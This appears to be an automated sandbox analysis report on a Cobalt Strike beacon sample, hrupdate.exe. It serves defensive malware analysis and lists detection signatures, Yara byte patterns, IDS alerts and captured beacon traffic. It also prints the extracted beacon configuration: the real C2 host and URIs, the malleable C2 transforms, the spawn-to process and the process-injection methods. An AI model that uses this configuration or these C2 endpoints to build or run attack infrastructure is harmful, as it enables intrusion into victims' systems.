Windows Analysis Report
hrupdate.exe

Overview

General Information

Sample name: hrupdate.exe
Analysis ID: 1578569
MD5: 03b14e9338a1c9e5551f9450207f6d84
SHA1: f1a816c47637c8d4d0b52b333cba11b0d7571fcb
SHA256: 7a4d2b3e83220df7a55944a838bb9ebaa8f8463cff62fa92ae10e640eeb4e498
Tags: CobaltStrike, exe, user-smica83

Detection

CobaltStrike
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected CobaltStrike
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Machine Learning detection for sample
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • hrupdate.exe (PID: 7428 cmdline: "C:\Users\user\Desktop\hrupdate.exe" MD5: 03B14E9338A1C9E5551F9450207F6D84)
  • cleanup
Name: Cobalt Strike, CobaltStrike
Description: Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit. The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
Attribution:
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 15000, "MaxGetSize": 2801745, "Jitter": 37, "C2Server": "www.hrtraining.ro,/rss/portallogin-gettask.html", "HttpPostUri": "/rss/portallogin-sendlogin.html", "Malleable_C2_Instructions": ["Remove 1522 bytes from the end", "Remove 84 bytes from the beginning", "Remove 3931 bytes from the beginning", "Base64 URL-safe decode", "XOR mask w/ random key"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\gpupdate.exe", "Spawnto_x64": "%windir%\\sysnative\\gpupdate.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 309948737, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 17500, "ProcInject_PrependAppend_x86": ["kJA=", "Empty"], "ProcInject_PrependAppend_x64": ["kJA=", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": ""}
Source | Rule | Description | Author | Strings
dump.pcap | Windows_Trojan_CobaltStrike_f0b627fc | Rule for beacon reflective loader | unknown
  • 0xd58b:$beacon_loader_x86: 25 FF FF FF 00 3D 41 41 41 00 75 3B 8B 4D B0 81 E1 FF FF FF 00 81 F9 42 42 42 00 75
  • 0xe236:$beacon_loader_x86: 25 FF FF FF 00 3D 41 41 41 00 75 3B 8B 4D B0 81 E1 FF FF FF 00 81 F9 42 42 42 00 75
dump.pcap | Windows_Trojan_Metasploit_7bc0f998 | Identifies the API address lookup function leverage by metasploit shellcode | unknown
  • 0x3f28a:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
dump.pcap | Windows_Trojan_Metasploit_c9773203 | Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. | unknown
  • 0x3f2f6:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
dump.pcap | Trojan_Raw_Generic_4 | unknown | unknown
  • 0xdf4e:$s0: 83 C6 02 8B 7D FC B9 40 00 00 00 F3 A4 8B 45 18 50 6A 40 8B 4D FC 51 E8 DD F8 FF FF 83 C4 0C 8B 55 FC 52 8B 45 14 50 8B 4D 08 8B 51 04 FF D2
  • 0xe52a:$s1: 0F B7 11 81 FA 4D 5A 00 00 75 2E 8B 45 FC 8B 48 3C 89 4D F8 83 7D F8 40 72 1F 81 7D F8 00 04 00 00 73 16 8B 55 F8 03 55 FC 89 55 F8 8B 45 F8 81 38 50 45 00 00 75 02 EB 0B 8B 4D FC 83 E9 01 89 ...
Source | Rule | Description | Author | Strings
00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_CobaltStrike_2 | Yara detected CobaltStrike | Joe Security
00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_CobaltStrike_3 | Yara detected CobaltStrike | Joe Security
00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_CobaltStrike_f0b627fc | Rule for beacon reflective loader | unknown
  • 0xbb91:$beacon_loader_x86: 25 FF FF FF 00 3D 41 41 41 00 75 3B 8B 4D B0 81 E1 FF FF FF 00 81 F9 42 42 42 00 75
  • 0xc764:$beacon_loader_x86: 25 FF FF FF 00 3D 41 41 41 00 75 3B 8B 4D B0 81 E1 FF FF FF 00 81 F9 42 42 42 00 75
00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Metasploit_7bc0f998 | Identifies the API address lookup function leverage by metasploit shellcode | unknown
  • 0x39798:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Metasploit_c9773203 | Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. | unknown
  • 0x39804:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
      No Sigma rule has matched
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-12-19T22:40:04.711841+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 3.79.209.76 | 80 | TCP
      2024-12-19T22:40:06.615659+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 3.79.209.76 | 80 | TCP

      AV Detection

      Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: CobaltStrike
      Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
      Source: hrupdate.exe | Joe Sandbox ML: detected
      Source: C:\Users\user\Desktop\hrupdate.exe | Code function: 0_2_04FD4173 CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_04FD4173
      Source: hrupdate.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknown | HTTPS traffic detected: 3.79.209.76:443 -> 192.168.2.4:49732 version: TLS 1.2
      Source: hrupdate.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: C:\Users\dan\source\repos\hrtraining\Release\hrupdate.pdb source: hrupdate.exe
      Source: Binary string: C:\Users\dan\source\repos\hrtraining\Release\hrupdate.pdb%% source: hrupdate.exe
      Source: C:\Users\user\Desktop\hrupdate.exe | Code function: 0_2_04FCE544 _malloc,__snprintf,FindFirstFileA,_malloc,__snprintf,FindNextFileA,FindClose,0_2_04FCE544
      Source: C:\Users\user\Desktop\hrupdate.exe | Code function: 0_2_04FC8839 _malloc,_memset,_strncmp,GetCurrentDirectoryA,FindFirstFileA,GetLastError,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_04FC8839

      Networking

      Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.4:49736
      Source: Malware configuration extractor | URLs: www.hrtraining.ro
      Source: global traffic | HTTP traffic detected: GET /trakingu/user HTTP/1.0 Host: www.hrtraining.ro
      Source: global traffic | HTTP traffic detected: GET /trainingcheck_v5498 HTTP/1.0 Host: www.hrtraining.ro
      Source: Joe Sandbox View | ASN Name: AMAZON-02US AMAZON-02US
      Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49731 -> 3.79.209.76:80
      Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49730 -> 3.79.209.76:80
      Source: global traffic | HTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Host: www.flntp.ro Accept-Encoding: gzip, deflate Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: unknown
      UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: C:\Users\user\Desktop\hrupdate.exe
      Code function: 0_2_00B01CA0 _invalid_parameter_noinfo_noreturn,memcpy,_invalid_parameter_noinfo_noreturn,memcpy,memchr,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,socket,inet_addr,inet_addr,gethostbyname,inet_addr,gethostbyaddr,htons,connect,closesocket,send,memset,recv,realloc,memcpy,memset,recv,strstr,strstr,memcpy,strncpy,closesocket,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00B01CA0
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /trakingu/user HTTP/1.0Host: www.hrtraining.ro
      Source: global trafficHTTP traffic detected: GET /trainingcheck_v5498 HTTP/1.0Host: www.hrtraining.ro
      Source: global trafficDNS traffic detected: DNS query: www.hrtraining.ro
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Thu, 19 Dec 2024 21:40:04 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
      Source: hrupdate.exeString found in binary or memory: http://www.hrtraining.ro/trainingcheck_v5498
      Source: hrupdate.exe, 00000000.00000002.2943524353.0000000004C6C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.hrtraining.ro/trainingcheck_v5498b
      Source: hrupdate.exeString found in binary or memory: http://www.hrtraining.ro/trainingcheck_v5498dummyhttp://www.hrtraining.ro/trakingu/invalid
      Source: hrupdate.exeString found in binary or memory: http://www.hrtraining.ro/trakingu/
      Source: hrupdate.exe, 00000000.00000002.2942801537.00000000010FB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.hrtraining.ro/trakingu/user
      Source: hrupdate.exe, 00000000.00000002.2942801537.00000000010FB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.hrtraining.ro/trakingu/useruser
      Source: hrupdate.exe, 00000000.00000003.1920601227.0000000005DCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/
      Source: hrupdate.exe, 00000000.00000003.1920601227.0000000005DCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/:D2
      Source: hrupdate.exe, 00000000.00000002.2942922670.0000000001289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/R
      Source: hrupdate.exe, 00000000.00000002.2943907526.0000000005DC0000.00000004.00000800.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.1920601227.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.html
      Source: hrupdate.exe, 00000000.00000003.2010673279.0000000005DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.html&X2
      Source: hrupdate.exe, 00000000.00000003.2672690716.0000000005DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.html03
      Source: hrupdate.exe, 00000000.00000002.2943907526.0000000005DC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.html:D2
      Source: hrupdate.exe, 00000000.00000003.2010673279.0000000005DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.html=
      Source: hrupdate.exe, 00000000.00000003.1920601227.0000000005DCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.html=E3&
